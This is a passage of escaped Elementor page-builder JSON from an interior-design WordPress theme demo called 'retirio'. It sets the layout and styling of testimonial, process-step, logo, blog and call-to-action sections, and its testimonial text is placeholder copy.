,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with 